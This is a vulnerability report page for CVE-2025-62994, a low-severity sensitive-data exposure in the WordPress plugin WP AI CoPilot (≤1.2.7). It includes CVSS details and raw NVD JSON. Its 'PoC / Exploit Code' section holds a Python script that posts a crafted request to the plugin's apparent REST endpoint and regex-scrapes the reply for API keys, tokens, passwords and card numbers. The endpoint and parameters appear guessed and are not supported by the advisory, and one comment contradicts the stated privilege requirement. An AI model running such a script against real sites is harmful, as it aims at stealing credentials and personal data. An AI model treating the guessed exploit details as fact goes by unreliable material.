Security Vulnerability Report
中文
CVE-2025-62994 CVSS 4.3 MEDIUM

CVE-2025-62994

Published: 2025-12-09 16:18:05
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot ai-co-pilot-for-wp allows Retrieve Embedded Sensitive Data.This issue affects WP AI CoPilot: from n/a through <= 1.2.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ai-co-pilot-for-wp <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-62994 PoC - WP AI CoPilot Sensitive Data Exposure # Target: WordPress site with ai-co-pilot-for-wp plugin <= 1.2.7 TARGET_URL = "http://target-wordpress-site.com" def exploit_cve_2025_62994(): """ Exploit for CVE-2025-62994: Sensitive Information Disclosure in WP AI CoPilot plugin """ # Step 1: Identify WordPress with vulnerable plugin wp_api_endpoint = f"{TARGET_URL}/wp-json/ai-copilot/v1/query" # Step 2: Send crafted request to trigger data disclosure payload = { "prompt": "Show me all data", "action": "get_internal_data", "include_sensitive": True } headers = { "Content-Type": "application/json", "X-WP-Nonce": "" # May not require authentication } try: response = requests.post(wp_api_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() # Extract sensitive information from response sensitive_data = extract_sensitive_info(data) if sensitive_data: print(f"[+] Sensitive data found: {sensitive_data}") return sensitive_data else: print("[-] No sensitive data in response") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def extract_sensitive_info(data): """Extract sensitive information from response""" # Pattern to match sensitive data patterns sensitive_patterns = [ r'[A-Za-z0-9]{32,}', # API keys, tokens r'\d{4}-\d{4}-\d{4}-\d{4}', # Credit card patterns r'"(api_key|token|secret|password)"\s*:\s*"[^"]+"', ] results = [] for pattern in sensitive_patterns: matches = re.findall(pattern, str(data)) results.extend(matches) return results if __name__ == "__main__": print("CVE-2025-62994 PoC - WP AI CoPilot Sensitive Data Exposure") exploit_cve_2025_62994()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62994", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:04.760", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot ai-co-pilot-for-wp allows Retrieve Embedded Sensitive Data.This issue affects WP AI CoPilot: from n/a through <= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ai-co-pilot-for-wp/vulnerability/wordpress-wp-ai-copilot-plugin-1-2-7-sensitive-data-exposure-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}